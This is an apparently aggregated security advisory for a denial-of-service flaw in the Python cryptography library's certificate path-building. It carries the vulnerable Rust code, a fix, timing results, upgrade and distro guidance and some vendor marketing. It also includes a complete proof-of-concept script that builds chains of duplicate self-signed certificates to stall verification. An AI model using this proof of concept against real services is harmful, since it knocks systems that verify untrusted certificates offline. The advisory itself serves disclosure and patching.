GHSA-jwv3-5hgf-82ww — cryptography
Fix: pyca/cryptography#14960GHSA-jwv3-5hgf-82ww is a Uncontrolled Resource Consumption vulnerability in cryptography. A fix is available for cryptography — see the affected versions and patch details below.
python-cryptography: Duplicate self-signed intermediates can cause exponential path-building
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
Exploitation and automatability from CISA’s SSVC triage for GHSA-jwv3-5hgf-82ww.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Real-World Exposure
cryptographyReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
When resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack.
This work was completed by Trail of Bits as part of the Patch The Planet project in collaboration with OpenAI. The finding was identified primarily by the Codex coding agent, and manually reviewed before submission.
Details
The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates.
fn build_chain_inner(
&self,
working_cert: &VerificationCertificate<'chain, B>,
current_depth: u8,
working_cert_extensions: &Extensions<'chain>,
name_chain: NameChain<'_, 'chain>,
budget: &mut Budget,
) -> ValidationResult<'chain, Chain<'chain, B>, B> {
if let Some(nc) = working_cert_extensions.get_extension(&NAME_CONSTRAINTS_OID) {
name_chain.evaluate_constraints(&nc.value()?, budget)?;
}
// Look in the store's root set to see if the working cert is listed.
// If it is, we've reached the end.
if self.store.contains(working_cert) {
return Ok(vec![working_cert.clone()]);
}
// Check that our current depth does not exceed our policy-configured
// max depth. We do this after the root set check, since the depth
// only measures the intermediate chain's length, not the root or leaf.
if current_depth > self.policy.max_chain_depth {
return Err(ValidationError::new(ValidationErrorKind::Other(
"chain construction exceeds max depth".into(),
)));
}
// Otherwise, we collect a list of potential issuers for this cert,
// and continue with the first that verifies.
let mut last_err: Option<ValidationError<'_, B>> = None;
for issuing_cert_candidate in self.potential_issuers(working_cert) {
// A candidate issuer is said to verify if it both
// signs for the working certificate and conforms to the
// policy.
let issuer_extensions = issuing_cert_candidate.certificate().extensions()?;
match self.policy.valid_issuer(
issuing_cert_candidate,
working_cert,
current_depth,
&issuer_extensions,
) {
Ok(_) => {
match self.build_chain_inner(
A sufficient patch is to track valid issuers, and to skip seen ones before recursing. By tracking valid issuers only, validation and custom extension-policy callbacks still run.
let mut seen_valid_issuers = Vec::<&VerificationCertificate<'chain, B>>::new();
for issuing_cert_candidate in self.potential_issuers(working_cert) {
. . .
Ok(_) => {
if seen_valid_issuers.contains(&issuing_cert_candidate) {
continue;
}
seen_valid_issuers.push(issuing_cert_candidate);
match self.build_chain_inner(
issuing_cert_candidate,
// NOTE(ww): According to RFC 5280, we should only
In testing, this fix removed the exponential blowup without breaking apparent correctness.
duplicates,max_depth,result,seconds
1,7,rejected,0.000464 -> 1,7,rejected,0.000667
2,7,rejected,0.025154 -> 2,7,rejected,0.001229
3,7,rejected,0.489924 -> 3,7,rejected,0.001619
4,7,rejected,4.309403 -> 4,7,rejected,0.002144
3,8,rejected,1.468193 -> 3,8,rejected,0.001811
4,8,timeout>5s, -> 4,8,rejected,0.002410
5,7,timeout>5s, -> 5,7,rejected,0.002640
6,6,timeout>5s, -> 6,6,rejected,0.002829
PoC
The following script benchmarks processing times for malicious cert chains.
import datetime
import multiprocessing
import time
import cryptography
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID
from cryptography.x509.verification import (
DNSName,
PolicyBuilder,
Store,
VerificationError,
)
NOW = datetime.datetime(2024, 1, 1, tzinfo=datetime.timezone.utc)
TIMEOUT = 5
CA_KEY_USAGE = x509.KeyUsage(
digital_signature=True,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=True,
encipher_only=False,
decipher_only=False,
)
EE_KEY_USAGE = x509.KeyUsage(
digital_signature=True,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
def name(common_name):
return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
def base_builder(subject, issuer, public_key, serial):
return (
x509.CertificateBuilder()
.subject_name(subject)
.issuer_name(issuer)
.public_key(public_key)
.serial_number(serial)
.not_valid_before(NOW - datetime.timedelta(days=1))
.not_valid_after(NOW + datetime.timedelta(days=30))
)
def make_ca(common_name, serial):
private_key = ec.generate_private_key(ec.SECP256R1())
subject = name(common_name)
cert = (
base_builder(subject, subject, private_key.public_key(), serial)
.add_extension(x509.BasicConstraints(ca=True, path_length=None), True)
.add_extension(CA_KEY_USAGE, True)
.add_extension(
x509.SubjectKeyIdentifier.from_public_key(private_key.public_key()),
False,
)
.sign(private_key, hashes.SHA256())
)
return private_key, cert
def make_leaf(issuer_key, issuer_cert):
private_key = ec.generate_private_key(ec.SECP256R1())
return (
base_builder(name("leaf"), issuer_cert.subject, private_key.public_key(), 100)
.add_extension(x509.BasicConstraints(ca=False, path_length=None), True)
.add_extension(EE_KEY_USAGE, True)
.add_extension(x509.SubjectAlternativeName([x509.DNSName("example.com")]), False)
.add_extension(
x509.AuthorityKeyIdentifier.from_issuer_public_key(issuer_key.public_key()),
False,
)
.add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.SERVER_AUTH]), False)
.sign(issuer_key, hashes.SHA256())
)
def build_material():
looping_key, looping_ca = make_ca("looping self-signed CA", 1)
_, unrelated_root = make_ca("unrelated trust anchor", 2)
leaf = make_leaf(looping_key, looping_ca)
return leaf, looping_ca, unrelated_root
def verify_case(duplicates, max_depth, queue):
leaf, looping_ca, unrelated_root = build_material()
verifier = (
PolicyBuilder()
.store(Store([unrelated_root]))
.time(NOW)
.max_chain_depth(max_depth)
.build_server_verifier(DNSName("example.com"))
)
start = time.perf_counter()
try:
verifier.verify(leaf, [looping_ca] * duplicates)
result = "accepted"
except VerificationError:
result = "rejected"
queue.put((result, time.perf_counter() - start))
def run_case(duplicates, max_depth):
queue = multiprocessing.Queue()
process = multiprocessing.Process(
target=verify_case,
args=(duplicates, max_depth, queue),
)
process.start()
process.join(TIMEOUT)
if process.is_alive():
process.terminate()
process.join()
print(f"{duplicates},{max_depth},timeout>{TIMEOUT}s,")
return
result, elapsed = queue.get()
print(f"{duplicates},{max_depth},{result},{elapsed:.6f}")
if __name__ == "__main__":
print("duplicates,max_depth,result,seconds")
for case in [(1, 7), (2, 7), (3, 7), (4, 7), (3, 8), (4, 8), (5, 7), (6, 6)]:
run_case(*case)
Impact
This issue exposes an amplification pathway over data that in many applications may be user-controlled, leading to the possibility of a denial of service through resource exhaustion. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | cryptography | ≥ 42.0.0&&< 49.0.0 | 49.0.0pip install --upgrade 'cryptography==49.0.0' |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for cryptography, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update cryptography to 49.0.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-jwv3-5hgf-82ww is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like GHSA-jwv3-5hgf-82ww can be triaged on real exposure rather than presence alone.
Tailored to GHSA-jwv3-5hgf-82ww. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Fixing This On Your OS
If you run this on a Linux distribution, patch through your package manager against the distro's own security advisory below — it tracks the exact backported fix for your release, which can ship on a different timeline (and sometimes a different severity) than the upstream project.
Red Hat rates this Important (CVSS 3.1 7.5). Duplicate self-signed intermediates can make PolicyBuilder path-building take seconds per request. GitHub CNA CVSS 4.0 is 8.7.
| Product | Fixed in | Advisory |
|---|---|---|
| Red Hat Enterprise Linux 10 | python3.14-cryptography-0:45.0.4-4.el10_2.5 | RHSA-2026:64795 |
| Red Hat Enterprise Linux 9 | python3.14-cryptography-0:45.0.4-4.el9_8.6 | RHSA-2026:64774 |
| Red Hat Hardened Images | python-cryptography-main-50.0.0-1.hum1 | RHSA-2026:55543 |
Frequently Asked Questions
Is GHSA-jwv3-5hgf-82ww in your dependencies?
O3 Security finds GHSA-jwv3-5hgf-82ww across PyPI dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.